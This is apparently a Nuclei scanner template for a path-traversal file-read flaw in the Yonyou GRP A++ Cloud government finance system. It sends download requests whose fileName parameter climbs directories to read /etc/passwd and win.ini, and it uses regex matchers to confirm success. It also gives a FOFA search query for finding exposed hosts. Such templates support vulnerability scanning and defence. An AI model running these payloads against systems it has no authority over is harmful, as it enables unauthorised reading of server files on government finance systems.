id: yonyou-grp-a-cloud-download-fileread
info:
  name: 用友 GRP A Cloud 政府财务云系统 download - fileread
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BGRPA%2B%2BCloud%E6%94%BF%E5%BA%9C%E8%B4%A2%E5%8A%A1%E4%BA%91%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: false
    fofa-query: app="用友-政务财务系统" || body="/pf/portal/login/css/fonts/style.css"
  tags: yonyou,fileread,oa,2024,grpacloud

http:
  - method: GET
    path:
      - "{{BaseURL}}/ma/emp/maEmp/download?fileName=../../../etc/passwd"
      - "{{BaseURL}}/ma/emp/maEmp/download?fileName=../../../c:/windows/win.ini"
  
    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or